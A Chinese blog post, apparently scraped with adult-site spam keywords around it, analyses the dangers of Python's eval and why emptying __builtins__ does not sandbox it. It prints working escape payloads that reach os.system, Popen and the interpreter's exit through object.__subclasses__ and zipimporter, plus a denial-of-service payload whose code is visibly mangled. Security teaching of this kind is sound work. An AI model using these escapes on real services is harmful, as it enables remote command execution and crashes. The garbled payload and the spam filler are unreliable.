>>eval("1+2")>>>eval("[xforxinrange(10)]")[0,1,2,3,4,5,6,7,8,9]當內存中的內置模塊含有os的話,eval同樣可以做到命令執行:>>>importos>>>eval("os.system('whoami')")win-20140812chj\administrat" />

亚洲免费在线-亚洲免费在线播放-亚洲免费在线观看-亚洲免费在线观看视频-亚洲免费在线看-亚洲免费在线视频

Python中eval帶來的潛在風險代碼分析

系統 1753 0

0x00 前言

eval是Python用于執行python表達式的一個內置函數,使用eval,可以很方便的將字符串動態執行。比如下列代碼:

            
>>> eval("1+2")
>>> eval("[x for x in range(10)]")
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
          

當內存中的內置模塊含有os的話,eval同樣可以做到命令執行:

            
>>> import os
>>> eval("os.system('whoami')")
win-20140812chj\administrator
          

當然,eval只能執行Python的表達式類型的代碼,不能直接用它進行import操作,但exec可以。如果非要使用eval進行import,則使用 __import__ :

            
>>> exec('import os')
>>> eval('import os')
Traceback (most recent call last):
 File "
            
              ", line 1, in 
              
                
 File "
                
                  ", line 1
  import os
     ^
SyntaxError: invalid syntax
>>> eval("__import__('os').system('whoami')")
win-20140812chj\administrator
                
              
            
          

在實際的代碼中,往往有使用客戶端數據帶入eval中執行的需求。比如動態模塊的引入,舉個栗子,一個在線爬蟲平臺上爬蟲可能有多個并且位于不同的模塊中,服務器端但往往只需要調用用戶在客戶端選擇的爬蟲類型,并通過后端的exec或者eval進行動態調用,后端編碼實現非常方便。但如果對用戶的請求處理不恰當,就會造成嚴重的安全漏洞。

0x01 “安全”使用eval

現在提倡最多的就是使用eval的后兩個參數來設置函數的白名單:

Eval函數的聲明為 eval(expression[, globals[, locals]])

其中,第二三個參數分別指定能夠在eval中使用的函數等,如果不指定,默認為globals()和locals()函數中 包含的模塊和函數。

            
>>> import os
>>> 'os' in globals()
True
>>> eval('os.system(\'whoami\')')
win-20140812chj\administrator

>>> eval('os.system(\'whoami\')',{},{})
Traceback (most recent call last):
 File "
            
              ", line 1, in 
              
                
 File "
                
                  ", line 1, in 
                  
                    
NameError: name 'os' is not defined
                  
                
              
            
          

如果指定只允許調用abs函數,可以使用下面的寫法:

            
>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
>>> eval('os.system(\'whoami\')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
 File "
            
              ", line 1, in 
              
                
 File "
                
                  ", line 1, in 
                  
                    
NameError: name 'os' is not defined
>>> eval('os.system(\'whoami\')')
win-20140812chj\administrator
                  
                
              
            
          

使用這種方法來防護,確實可以起到一定的作用,但是, 這種處理方法可能會被繞過 ,從而造成其他問題!

0x02 繞過執行代碼1

被繞過的情景如下,小明知道了eval會帶來一定的安全風險,所以使用如下的手段去防止eval執行任意代碼:

            
env = {}
env["locals"]  = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
eval(users_str, env)
          

Python中的 __builtins__ 是內置模塊,用來設置內置函數的模塊。比如熟悉的abs,open等內置函數,都是在該模塊中以字典的方式存儲的,下面兩種寫法是等價的:

            
>>> __builtins__.abs(-20)
>>> abs(-20)
          

我們也可以自定義內置函數,并像使用Python中的內置函數一樣使用它們:

            
>>> def hello():
...   print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi
          

小明將eval函數的作用域中的內置模塊設置為 None ,好像看起來很徹底了,但依然可以被繞過。 __builtins__ 是 __builtin__ 的一個引用,在 __main__ 模塊下,兩者是等價的:

            
>>> id(__builtins__)
>>> id(__builtin__)
          

根據 烏云drops 提到的方法,使用如下代碼即可:

            
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
          

上面的代碼首先利用 __class__ 和 __subclasses__ 動態加載了 object 對象,這是因為eval中無法直接使用object。然后使用object的子類的zipimporter對egg壓縮文件中的configobj模塊進行導入,并調用其內置模塊中的os模塊從而實現命令執行,當然,前提是要有configobj的egg文件。 configobj模塊很有意思,居然內置了os模塊:

            
>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chj\administrator
          

和configobj類似的模塊如 urllib , urllib2 , setuptools 等都有os的內置,理論上使用哪個都行。 如果無法下載egg壓縮文件,可以下載帶有setup.py的文件夾,加入:

            
from setuptools import setup, find_packages 
          

然后執行:

            
python setup.py bdist_egg
          

就可以在dist文件夾中找到對應的egg文件。 繞過demo如下:

            
>>> env = {}
>>> env["locals"]  = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chj\administrator

>>> eval(users_str, {}, {})
win-20140812chj\administrator
          

0x03 拒絕服務攻擊1

object的子類中有很多有趣的東西,執行以下代碼查看:

            
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
          

這里我就不輸出結果了,如果你執行的話,可以看到很多有趣的模塊,比如file,zipimporter,Quitter等。經過測試,file的構造函數是被解釋器沙箱隔離的。 簡單的,或者直接使object暴露出的子類Quitter進行退出:

            
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})

C:/>
          

如果運氣好,遇到對方程序中導入了 os 等敏感模塊,那么Popen就可以用,并且繞過 __builins__ 為空的限制,栗子如下:

            
>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})

            
              
>>>
正在 Ping 127.0.0.1 具有 32 字節的數據:
來自 127.0.0.1 的回復: 字節=32 時間<1ms TTL=64
.0.0.1 的 Ping 統計信息:
  數據包: 已發送 = 1,已接收 = 1,丟失 = 0 (0% 丟失),
往返行程的估計時間(以毫秒為單位):
  最短 = 0ms,最長 = 0ms,平均 = 0ms
>>>
            
          

事實上,這種情況非常多,比如導入os模塊,一般用來處理路徑問題。所以說,遇到這種情況,完全可以列舉大量的功能函數,來探測目標object的子類中是否含有一些危險的函數可以直接使用。

0x04 拒絕服務攻擊2

同樣,我們甚至可以繞過 __builtins__ 為None,造成一次拒絕服務攻擊,Payload(來自老外blog)如下:

            
>>> eval('(lambda fc=(lambda n: .__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})
          

運行上面的代碼,Python直接crash掉了,造成拒絕服務攻擊。 原理是通過嵌套的lambda來構造一片代碼段,即code對象。為這個code對象分配空的棧,并給出相應的代碼字符串,這里是 KABOOM ,在空棧上執行代碼,會出現crash。構造完成后,調用fc函數即可觸發,其思路不可謂不淫蕩。

0x05 總結

從上面的內容我們可以看出,單單將內置模塊置為空,是不夠的,最好的機制是構造白名單,如果覺得比較麻煩,可以使用 ast.literal_eval 代替不安全的 eval 。

以上就是本文關于Python中eval帶來的潛在風險代碼分析的全部內容,希望對大家有所幫助。感興趣的朋友可以繼續參閱本站其他相關專題,如有不足之處,歡迎留言指出。感謝朋友們對本站的支持!


更多文章、技術交流、商務合作、聯系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦!!!

發表我的評論
最新評論 總共0條評論
主站蜘蛛池模板: 快色视频网站 | 日韩精品中文字幕视频一区 | 亚洲精品免费日日日夜夜夜夜 | 日本不卡高清视频 | 国产亚洲一区二区精品 | 天堂精品视频 | 寡妇一级a毛片免费播放 | 国产视频自拍一区 | 日本在线亚州精品视频在线 | 久久不见久久见免费影院 | 欧美成人看片黄a免费 | 精品久久伦理中文字幕 | 午夜性色吃奶添下面69影院 | 亚洲国产一区二区三区四区 | 亚洲精品在线看 | 四虎在线精品免费高清在线 | 大学生一级毛片免费看真人 | 在线亚洲 欧美 日本专区 | 91精品福利视频 | 国产―笫一页―浮力影院xyz | 亚洲第一页色 | 国产午夜成人无码免费看 | 日韩欧美高清在线观看 | 韩国爱情片免费大全 | 久久视频这里只有精品 | 久久久国产精品免费视频 | a级毛片视频| 欧美日韩精选 | 一级欧美激情毛片 | 色拍自拍亚洲综合在线 | 日本在线小视频 | 久久福利青草精品资源站免费 | 国产第九页| 日本波多野结衣字幕久久 | 天天操天天干天天摸 | 欧美日本在线视频 | 日韩欧美在线看 | 亚洲视频一区二区在线观看 | 日日日日操| 成人久久网站 | 情趣色视频网站 |